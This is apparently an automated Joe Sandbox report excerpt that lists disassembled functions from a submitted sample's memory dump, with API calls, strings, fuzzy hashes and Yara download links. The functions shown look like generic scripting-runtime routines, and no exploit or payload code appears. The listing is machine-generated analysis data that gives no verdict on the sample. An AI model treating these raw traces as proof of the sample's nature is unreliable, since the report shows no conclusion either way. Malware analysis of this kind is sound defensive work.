LoadCursorW.USER32(00000000,00007F81), ref: 00C8504A
LoadCursorW.USER32(00000000,00007F88), ref: 00C85055
LoadCursorW.USER32(00000000,00007F80), ref: 00C85060
LoadCursorW.USER32(00000000,00007F86), ref: 00C8506B
LoadCursorW.USER32(00000000,00007F83), ref: 00C85076
LoadCursorW.USER32(00000000,00007F85), ref: 00C85081
LoadCursorW.USER32(00000000,00007F82), ref: 00C8508C
LoadCursorW.USER32(00000000,00007F84), ref: 00C85097
LoadCursorW.USER32(00000000,00007F04), ref: 00C850A2
LoadCursorW.USER32(00000000,00007F02), ref: 00C850AD
LoadCursorW.USER32(00000000,00007F89), ref: 00C850B8
GetCursorInfo.USER32(?), ref: 00C850C8

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 0d4f1af851af7ce10f206a77b8b883df753a15724a29b89eab86581ca319132c
Instruction ID: f6ce81bcb912f434c8cd074d4c0d078d78432c43b7034a2031eb985423f41b07
Opcode Fuzzy Hash: 0d4f1af851af7ce10f206a77b8b883df753a15724a29b89eab86581ca319132c
Instruction Fuzzy Hash: 7C3135B0D4831D6ADF109FB68C8999FBFE8FF04754F50452AA51CE7280DB7865008F95

Function 00C9A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9A259
DestroyWindow.USER32(?,?), ref: 00C9A2D3

Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C9A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C9A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C9A382
DestroyWindow.USER32(00000000), ref: 00C9A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C10000,00000000), ref: 00C9A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C9A3F4
GetDesktopWindow.USER32 ref: 00C9A40D
GetWindowRect.USER32(00000000), ref: 00C9A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C9A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C9A444

Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC

Strings

0, xrefs: 00C9A26F
tooltips_class32, xrefs: 00C9A346, 00C9A3D4

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 09f3ff83dd59b1d48e61159c122b016c85ac5f09dd0813102e62c25b5db3630d
Instruction ID: eb54e6acd056b769a94409930188bebc423471cbcea60941e9be9bbe000c6a98
Opcode Fuzzy Hash: 09f3ff83dd59b1d48e61159c122b016c85ac5f09dd0813102e62c25b5db3630d
Instruction Fuzzy Hash: 05717B71140205AFDB21CF28CC4DFAA7BE5FB89704F04452EF995872A1D7B1EA42DB92

Function 00C9C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623

DragQueryPoint.SHELL32(?,?), ref: 00C9C627

Part of subcall function 00C9AB37: ClientToScreen.USER32(?,?), ref: 00C9AB60
Part of subcall function 00C9AB37: GetWindowRect.USER32(?,?), ref: 00C9ABD6
Part of subcall function 00C9AB37: PtInRect.USER32(?,?,00C9C014), ref: 00C9ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 00C9C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C9C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C9C6BE
_wcscat.LIBCMT ref: 00C9C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C9C705
SendMessageW.USER32(?,000000B0,?,?), ref: 00C9C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 00C9C735
SendMessageW.USER32(?,000000B1,?,?), ref: 00C9C757
DragFinish.SHELL32(?), ref: 00C9C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C9C851

Strings

@GUI_DRAGID, xrefs: 00C9C7C9
@GUI_DRAGFILE, xrefs: 00C9C800
@GUI_DROPID, xrefs: 00C9C77E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 24356444f67ff6720d97c22d51f2849141e3c7fc5fa7990cb1f7b08019ab27ec
Instruction ID: 699d5a08f81ea68494c248777850c8ae9ceccc9e3554aaa49f8ea66c7b43674f
Opcode Fuzzy Hash: 24356444f67ff6720d97c22d51f2849141e3c7fc5fa7990cb1f7b08019ab27ec
Instruction Fuzzy Hash: A0616F71108305AFCB01EF64DC89EAFBBF8EF89710F10092EF595961A1DB709A49DB52

Function 00C94392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C94424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C9446F

Strings

GETSELECTED, xrefs: 00C9457F
COLLAPSE, xrefs: 00C944B5
GETTEXT, xrefs: 00C945C2
GETITEMCOUNT, xrefs: 00C94551
GETTOTALCOUNT, xrefs: 00C94456
CHECK, xrefs: 00C9448F
EXISTS, xrefs: 00C944D8
ISCHECKED, xrefs: 00C945F2
UNCHECK, xrefs: 00C9464B
EXPAND, xrefs: 00C94521
SELECT, xrefs: 00C94620

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: f055d8d713340eb6cef3bb2e9d843943424fdf50e0de5a87f7acbf4051ffd902
Instruction ID: 160b4b51e247b86fa1a091898d2b9c330f98bde96dcc4a5d8b6c908409335d3b
Opcode Fuzzy Hash: f055d8d713340eb6cef3bb2e9d843943424fdf50e0de5a87f7acbf4051ffd902
Instruction Fuzzy Hash: FA915F712043019BCF18EF10C465AAEB7E5EF96354F15846CF8965B3A2CB31ED4AEB41

Function 00C9B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C9B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C991C2), ref: 00C9B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C9B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C9B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C9B9C3
FreeLibrary.KERNEL32(?), ref: 00C9B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C9B9DF
DestroyIcon.USER32(?,?,?,?,?,00C991C2), ref: 00C9B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C9BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C9BA17

Part of subcall function 00C32EFD: __wcsicmp_l.LIBCMT ref: 00C32F86

Strings

.exe, xrefs: 00C9B84A
.icl, xrefs: 00C9B82A
.dll, xrefs: 00C9B86D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 18c95d4399040acb69704bee265ec7308e6bfe24288880627c3fb76650385f65
Instruction ID: 45fa78c4a3c0d4c07f982e9c38f2af3b21532d82a5603f6231b5c050fe45f044
Opcode Fuzzy Hash: 18c95d4399040acb69704bee265ec7308e6bfe24288880627c3fb76650385f65
Instruction Fuzzy Hash: 5D61FE71910218BAEF24DF64DD49FBE77B8EB08710F10411AF925D60C0DB70AE80E7A0

Function 00C7A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

CharLowerBuffW.USER32(?,?), ref: 00C7A3CB
GetDriveTypeW.KERNEL32 ref: 00C7A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7A4C5

Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06

Strings

close cd wait, xrefs: 00C7A4B0
open , xrefs: 00C7A427
closed, xrefs: 00C7A3DF, 00C7A3E8
type cdaudio alias cd wait, xrefs: 00C7A443
wait, xrefs: 00C7A482
close, xrefs: 00C7A3D1
open, xrefs: 00C7A3F2
set cd door , xrefs: 00C7A466

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 147a7a22967beac2fee7929359dba6aa82f154aba94f7058f3c64a5b16db690f
Instruction ID: 89550b27f5aa2250e613667c4237c175f1415bf89c88e7b303cb3b00c36ff337
Opcode Fuzzy Hash: 147a7a22967beac2fee7929359dba6aa82f154aba94f7058f3c64a5b16db690f
Instruction Fuzzy Hash: 91513D711082059FC700EF10C8919AFB3F4EF85758F10896DF89957251DB31EE4AEB92

Function 00C6F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C6F8DF
LoadStringW.USER32(00000000,?,00C4E029,00000001), ref: 00C6F8E8

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

GetModuleHandleW.KERNEL32(00000000,00CD5310,?,00000FFF,?,?,00C4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C6F90A
LoadStringW.USER32(00000000,?,00C4E029,00000001), ref: 00C6F90D
__swprintf.LIBCMT ref: 00C6F95D
__swprintf.LIBCMT ref: 00C6F96E
_wprintf.LIBCMT ref: 00C6FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C6FA2E

Strings

Line %d:, xrefs: 00C6F968
^ ERROR, xrefs: 00C6F9C3
Line %d (File "%s"):, xrefs: 00C6F957
%s (%d) : ==> %s: %s %s, xrefs: 00C6FA12
Error: , xrefs: 00C6F9E5

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: d47b9e3d3e555895d6261e24e53cf834199b5e9a11666d3fa8e00a6295e05418
Instruction ID: 39451beeaed57cd9860eb90a4b698dac85f336d6459f15d7b629f64980b4ea4b
Opcode Fuzzy Hash: d47b9e3d3e555895d6261e24e53cf834199b5e9a11666d3fa8e00a6295e05418
Instruction Fuzzy Hash: 8D413F7280410DAACF15FBE0DD96EEE7778AF55300F100569F505B6092EB316F4AEB61

Function 00C9BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C99207,?,?), ref: 00C9BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BA85
GlobalLock.KERNEL32(00000000), ref: 00C9BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00C9BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C99207,?,?,00000000,?), ref: 00C9BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00CA2CAC,?), ref: 00C9BAD7
GlobalFree.KERNEL32(00000000), ref: 00C9BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00C9BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00C9BB36
DeleteObject.GDI32(00000000), ref: 00C9BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C9BB74

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 6fd1593d142e28722ea65a9c57d9e0aedb73f70dc0ac9dc96b4f005feb20bac6
Instruction ID: e67ed7f2c89e6b02ce4efa50c488f3368be3b0521528b6d75bc5104128c4dfa6
Opcode Fuzzy Hash: 6fd1593d142e28722ea65a9c57d9e0aedb73f70dc0ac9dc96b4f005feb20bac6
Instruction Fuzzy Hash: EF412675600209FFDB119F65ED8CFAEBBB8EB89711F104069F919D62A0C7709E02DB60

Function 00C7D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00C7DA10
_wcscat.LIBCMT ref: 00C7DA28
_wcscat.LIBCMT ref: 00C7DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C7DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DA63
GetFileAttributesW.KERNEL32(?), ref: 00C7DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00C7DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00C7DAA7

Strings

*.*, xrefs: 00C7DAE6

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: aaa607cdd6a3717cc7426503e0ab6a965f6cbd08be4f4d7ebc7084a44048391b
Instruction ID: 4cd3e1ce731726fc284a20d631b7b28bb43f820024042983d295488b20e9c90c
Opcode Fuzzy Hash: aaa607cdd6a3717cc7426503e0ab6a965f6cbd08be4f4d7ebc7084a44048391b
Instruction Fuzzy Hash: EC8171715042419FCB24EF65C844AAAB7F4FF89310F18C82EF99EC7251EA30DA85DB52

Function 00C9C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C9C1FC
GetFocus.USER32 ref: 00C9C20C
GetDlgCtrlID.USER32(00000000), ref: 00C9C217
_memset.LIBCMT ref: 00C9C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C9C36D
GetMenuItemCount.USER32(?), ref: 00C9C38D
GetMenuItemID.USER32(?,00000000), ref: 00C9C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C9C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C9C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C9C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C9C489

Strings

0, xrefs: 00C9C33A

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 3123ba2e211c89331d0b905ba052fb45427d55a258a92050b810f4ba46aed4df
Instruction ID: e9a891c013dd776863cab7bf6421db9ae9c2bee58e07fb96fced2677e1936959
Opcode Fuzzy Hash: 3123ba2e211c89331d0b905ba052fb45427d55a258a92050b810f4ba46aed4df
Instruction Fuzzy Hash: 35817D716083019FDB10CF14C9D8ABBBBE8FB88714F10492EF9A5972A1D770DA05DB62

Function 00C8731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C8738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C8739B
CreateCompatibleDC.GDI32(?), ref: 00C873A7
SelectObject.GDI32(00000000,?), ref: 00C873B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C87408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C87444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C87468
SelectObject.GDI32(00000006,?), ref: 00C87470
DeleteObject.GDI32(?), ref: 00C87479
DeleteDC.GDI32(00000006), ref: 00C87480
ReleaseDC.USER32(00000000,?), ref: 00C8748B

Strings

(, xrefs: 00C87410

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: cf5e394ee4f43b560815a3f7be60ad652c2cd162f4ecaa7685b0fddf25bdda88
Instruction ID: 39790185634f21678cd90efcb1246fc586006dd4e7bee62eaa02bed45675a5ba
Opcode Fuzzy Hash: cf5e394ee4f43b560815a3f7be60ad652c2cd162f4ecaa7685b0fddf25bdda88
Instruction Fuzzy Hash: A1513775904309EFCB14DFA9CC89FAEBBB9EF48310F24852EF95997220D731A9418B54

Function 00C90E1A Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31

Strings

HKEY_CURRENT_USER, xrefs: 00C90F10
HKEY_CURRENT_CONFIG, xrefs: 00C90EEE
HKCC, xrefs: 00C90EFF
HKEY_LOCAL_MACHINE, xrefs: 00C90E9A
HKEY_CLASSES_ROOT, xrefs: 00C90EC4
HKLM, xrefs: 00C90EAF
HKU, xrefs: 00C90F43
HKCU, xrefs: 00C90F21
(l, xrefs: 00C90E89
HKCR, xrefs: 00C90ED9
HKEY_USERS, xrefs: 00C90F32

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: BuffCharUpper
String ID: (l$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-850723230
Opcode ID: ab99bd6af9eb8e8de71e1cdcf6b37fce688bdf6ecd52f0a51cf60cab22b964ee
Instruction ID: 7a90989bbf9678227b3376d1f1bb2069fae4d57e3da9b135052b8757ba47884e
Opcode Fuzzy Hash: ab99bd6af9eb8e8de71e1cdcf6b37fce688bdf6ecd52f0a51cf60cab22b964ee
Instruction Fuzzy Hash: 7941497211024A8FCF14EF50E869AEF3764FF11340F240458FC665B292DB319E5AEBA0

Function 00C16A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

